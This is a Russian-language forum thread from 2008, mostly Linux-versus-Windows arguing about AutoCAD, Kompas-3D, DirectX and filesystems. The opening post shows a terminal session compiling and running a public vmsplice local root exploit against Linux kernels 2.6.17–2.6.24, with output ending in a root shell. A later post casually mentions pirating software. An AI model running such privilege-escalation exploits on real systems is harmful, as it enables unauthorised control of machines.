Автор Тема: Привет, линуксойды  (Прочитано 28948 раз)

Оффлайн Нервный

• Ветеран
    • Просмотр профиля
Привет, линуксойды
« : 11.02.08, 14:25:06 »
Повышение привилегий пользователя до суперпользователя. Уязвимы ядра 2.6.17 - 2.6.24
grotesque@sanarin:~$ cc -o root root.c
grotesque@sanarin:~$ ./root
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x40149000 .. 0x4017b000
[+] root
root@sanarin:~# mkdir /privet
root@sanarin:~# ls /
bin  boot  dev  etc  home  lib  lost+found  mnt  old  opt  optsun  privet
proc  procc  root  sbin  sparc-linux  sparc-solaris  sys  tftpboot  tmp  usr
var
root@sanarin:~#

Иногда срабатывает не с первого раза. Со второго-третьего срабатывает.

Оффлайн Kasen

• Старожил
  • Тупайа пихота.
    • Просмотр профиля
Re: Привет, линуксойды
« Ответ #161 : 13.02.08, 16:22:42 »
Насчет версий для студентов и облегченных, несколько раз сталкивался с недостаточным функционалом, но мне для того чтобы сделать например курсовую не по корману купить тот же компас3д, который тут упоминался. Приходилось воровать, а это конечно не приятно.
у нас оффициально предлагался компас3д LT - студенческая версия, бесплатная... раздавали в универе.. естественно и задачи ставили вполне осуществимые в этой программе))
честно говоря.. как бы не расхваливали компас сам по себе (не говорю про обрезанную версию), но автокад лучше, но правда от компаса никуда не денешься - он единственный кто делает по ГОСТУ, а мы к сожалению живем в такой стране, где консерватизм и бюрократия порой стоят первее здравого смысла.. и проект сделанный в автокаде просто засрут из-за, хотя бы не гостовских шрифтов)
Знаю такую, как раз она меня и подвела отсутсвием возможности вставить растровые изображения...

Оффлайн Нервный

• Ветеран
    • Просмотр профиля
« Ответ #162 : 13.02.08, 16:22:57 »
Да наберет, никуда не денется - там слишком взрослые дядьки в игру вступили. Скажем, какая у нас самая популярная фирма по производству мобильников? Правильно - Nokia. А в курсе, что нокиа покупает троллтех,  а троллтех это кутэ, а на кутэ написана самая популярная графическая оболочка - КДЕ. Думаете будут портировать кутэ под симбиан? Вот уж я сомневаюсь. Тем более что у троллтеха уже есть Qtopia, которая работает под линукс, а у нокии уже есть аппараты на базе линукс.
да я только рад буду! я ЗА кроссплатформенные приложения
НО
кутя инкапсулирует только вызовы гуи
он не реализует кроссплатформенную поддержку директикс поэтому аутодеск инвентор например никогда не будет нигде кроме как под венду (если конечно вслед за моно не будет реализован какой нить дуо который будет аналогом директикс)

открою секрет - директ икс тормозит вывод изображений где-то раза в 2-2,5... поэтому от него в скором времени откажутся разработчики игр)

Директс икс ничего не тормозит и поэтому разработчики игр от него не откажутся никогда.

Оффлайн pantera

• Ветеран
  • У меня жОлтые глаза
    • Просмотр профиля
« Ответ #163 : 13.02.08, 16:23:20 »
Компас нравица только Станкиновцам :-)
слушай, а ты застал Автокад 10? где не было мышки и надо было вбивать LINE,ARC... Я после этого в 14 автокаде по привычке курсовые и лабы через команды делал, скорость работы была выше, чем у "мышечников". :)

Оффлайн mitya

• Ветеран
    • Просмотр профиля
« Ответ #164 : 13.02.08, 16:24:38 »
Насчет версий для студентов и облегченных, несколько раз сталкивался с недостаточным функционалом, но мне для того чтобы сделать например курсовую не по корману купить тот же компас3д, который тут упоминался. Приходилось воровать, а это конечно не приятно.
у нас оффициально предлагался компас3д LT - студенческая версия, бесплатная... раздавали в универе.. естественно и задачи ставили вполне осуществимые в этой программе))
честно говоря.. как бы не расхваливали компас сам по себе (не говорю про обрезанную версию), но автокад лучше, но правда от компаса никуда не денешься - он единственный кто делает по ГОСТУ, а мы к сожалению живем в такой стране, где консерватизм и бюрократия порой стоят первее здравого смысла.. и проект сделанный в автокаде просто засрут из-за, хотя бы не гостовских шрифтов)
Знаю такую, как раз она меня и подвела отсутсвием возможности вставить растровые изображения...
вы просто не умеете их готовить(с)
и шрифты любые вставляются в автокад :-:)

Оффлайн mitya

• Ветеран
    • Просмотр профиля
« Ответ #165 : 13.02.08, 16:25:12 »
слушай, а ты застал Автокад 10? где не было мышки и надо было вбивать LINE,ARC... Я после этого в 14 автокаде по привычке курсовые и лабы через команды делал, скорость работы была выше, чем у "мышечников". :)
она и в 2008 выше будет

Оффлайн Нервный

• Ветеран
    • Просмотр профиля
« Ответ #166 : 13.02.08, 16:25:46 »
> слушай, а ты застал Автокад 10? где не было мышки и надо было вбивать LINE,ARC...

Я застал автокад 10 и мышка там была. Линуксойд не осилил настройку мышки под ДОС.

Оффлайн Пабло Бартолле

• Ветеран
  • аллергия на чушь
    • Просмотр профиля
« Ответ #167 : 13.02.08, 16:26:21 »
на самом деле при наличии прямых рук в автокаде можно делать все по госту
для ленивых в тырнете есть паки (шрифты, форматы, настройки линий, стрелочек и т.п.)

а еще есть платные проги типа меканикс (для выпуска документации по ескд) со многими вкусностями
вам стоит боятца меня на дороге по двум причинам:
- я сдал на права
- я сдал на права с шестого раза...

Оффлайн pantera

• Ветеран
  • У меня жОлтые глаза
    • Просмотр профиля
« Ответ #168 : 13.02.08, 16:27:16 »
она и в 2008 выше будет
наверно,когда я заканчивал универ, последняя версия была  2002. Но после 14 была реально неудобная.

youctac

• Гость
« Ответ #169 : 13.02.08, 16:27:41 »
Мышь VS Клава ?

Оффлайн pantera

• Ветеран
  • У меня жОлтые глаза
    • Просмотр профиля
« Ответ #170 : 13.02.08, 16:29:13 »
> слушай, а ты застал Автокад 10? где не было мышки и надо было вбивать LINE,ARC...

Я застал автокад 10 и мышка там была. Линуксойд не осилил настройку мышки под ДОС.
эээ, ну и где в автокаде 10 кнопка LINE?

Оффлайн pantera

• Ветеран
  • У меня жОлтые глаза
    • Просмотр профиля
« Ответ #171 : 13.02.08, 16:32:29 »
Нервный опять попи#$#$ть пришел :)

Оффлайн Нервный

• Ветеран
    • Просмотр профиля
« Ответ #172 : 13.02.08, 16:33:10 »
а у меня вопрос
какими программами из под линукса вы пользуетесь?
кроме браузера видео/аудио плеера и всяких архиваторов и прочей мишуры

Никакими программами они не пользуются. И плеера нормального у них нет. Им ничего не надо. Фильмов в HD качестве у них нет. Не надо им. У них ни одна из зоопарка файловых систем прозрачную компрессию не может. Зачем оно им. Не надо.
« Последнее редактирование: 13.02.08, 16:38:36 от Нервный »

Оффлайн Нервный

• Ветеран
    • Просмотр профиля
« Ответ #173 : 13.02.08, 16:37:16 »

В левой части экрана среди прочих.

Оффлайн ИТСМИ

• Ветеран
    • Просмотр профиля
« Ответ #174 : 13.02.08, 16:42:40 »

Ага, на лабах в Бауманке :-)
больше им нигде не пользовался
Не вижу повода, чтобы не выпить.

Оффлайн ANtZ [[devil]] RгоDkA

• Ветеран
  • Я ηε ραδοταю β Эλςαϋτ!
    • Просмотр профиля
« Ответ #175 : 13.02.08, 16:46:51 »
на самом деле при наличии прямых рук в автокаде можно делать все по госту
для ленивых в тырнете есть паки (шрифты, форматы, настройки линий, стрелочек и т.п.)

а еще есть платные проги типа меканикс (для выпуска документации по ескд) со многими вкусностями
ну мне на это все как-то.. с высокой колокольни... я сдал и забыл))
эτο ηε ωρυφτ - эτο ποҹερκ τακοϋ ;-)
у меня весомый аргумент!
местная шлюшка на расхват...

Оффлайн Нервный

• Ветеран
    • Просмотр профиля
« Ответ #176 : 13.02.08, 16:49:26 »
насчет,слишком большой - у каждого свои понятия. Предлагаю озвучить цифры здесь или в привате. А вообще да, есть такой миф , не миф - что линуксоиды получают больше. Если кому не лень, могут покопаться на старом форуме, помню точно, что Нервный тогда в очередной раз исходил на ...., и доказывал что это не правильно.
и в чем по вашему "особенность" линуксойдов по причине которой они получают больше?

открою секрет - директ икс тормозит вывод изображений где-то раза в 2-2,5... поэтому от него в скором времени откажутся разработчики игр)
голсловное утверждение
посмотри у меня в профиле где я работаю... это будет подтверждением)

Хорошее подтверждение. На одном из объектов. По ляликсом. Ваши подделки. Мягко говоря, не очень дружат с видеостеной производства одной прекрасной компании на букву "B". Ну, раз в три денька одна из шести ваших прекрасных видеокарточек перестают выдавать изображение и оператор по реглементу должен в течении двух часов остановить реактор. Знаете, что ваша прекрасная компания ответила на моё письмо им ? Что линукс драйвера ансуппортед и иди на форум умоляй местных дегенератов помочь тебе. Зато как изменился их тон, когда я им написал про Висту. Мы очень извиняемся. Мгновенно решим. И действительно, буквально в следующей же версии драйвера.

Оффлайн ИТСМИ

• Ветеран
    • Просмотр профиля
« Ответ #177 : 13.02.08, 16:50:15 »
В левой части экрана среди прочих.

Поддержка мыши была только не помню с 10 или 11 версии. Но там было очень неудобное меню, пока  доберешься мышкой до команды, за это время можно написать 10 команд
Не вижу повода, чтобы не выпить.

Оффлайн ANtZ [[devil]] RгоDkA

• Ветеран
  • Я ηε ραδοταю β Эλςαϋτ!
    • Просмотр профиля
« Ответ #178 : 13.02.08, 16:55:05 »
насчет,слишком большой - у каждого свои понятия. Предлагаю озвучить цифры здесь или в привате. А вообще да, есть такой миф , не миф - что линуксоиды получают больше. Если кому не лень, могут покопаться на старом форуме, помню точно, что Нервный тогда в очередной раз исходил на ...., и доказывал что это не правильно.
и в чем по вашему "особенность" линуксойдов по причине которой они получают больше?

голсловное утверждение
посмотри у меня в профиле где я работаю... это будет подтверждением)

Хорошее подтверждение. На одном из объектов. По ляликсом. Ваши подделки. Мягко говоря, не очень дружат с видеостеной производства одной прекрасной компании на букву "B". Ну, раз в три денька одна из шести ваших прекрасных видеокарточек перестают выдавать изображение и оператор по реглементу должен в течении двух часов остановить реактор. Знаете, что ваша прекрасная компания ответила на моё письмо им ? Что линукс драйвера ансуппортед и иди на форум умоляй местных дегенератов помочь тебе. Зато как изменился их тон, когда я им написал про Висту. Мы очень извиняемся. Мгновенно решим. И действительно, буквально в следующей же версии драйвера.
а я и не говорил, про то что официальная позиция компании - это Линукс, как впрочем и не говорил, что официальная позиция компании - это Windows
эτο ηε ωρυφτ - эτο ποҹερκ τακοϋ ;-)
у меня весомый аргумент!
местная шлюшка на расхват...

Оффлайн Нервный

• Ветеран
    • Просмотр профиля
« Ответ #179 : 13.02.08, 16:55:23 »
 Рассказать вам, нещастные, зачем нужна прозрачная компрессия ? Сами админы локалхостов вряд-ли догадаются. Индустриальные флешки имеют емкость 4 гига - это очень новые модели. Менее года назад появились. До этого было 1-2. Дальше думайте сами. Тем, что у вас между ушей.

Оффлайн rockerzz

• Старожил
  • Freefly
    • Просмотр профиля
« Ответ #180 : 13.02.08, 16:55:46 »
Никакими программами они не пользуются. И плеера нормального у них нет. Им ничего не надо. Фильмов в HD качестве у них нет. Не надо им. У них ни одна из зоопарка файловых систем прозрачную компрессию не может. Зачем оно им. Не надо.

Никак на гугле забанили?  jfs, reiser?
Fly like a brick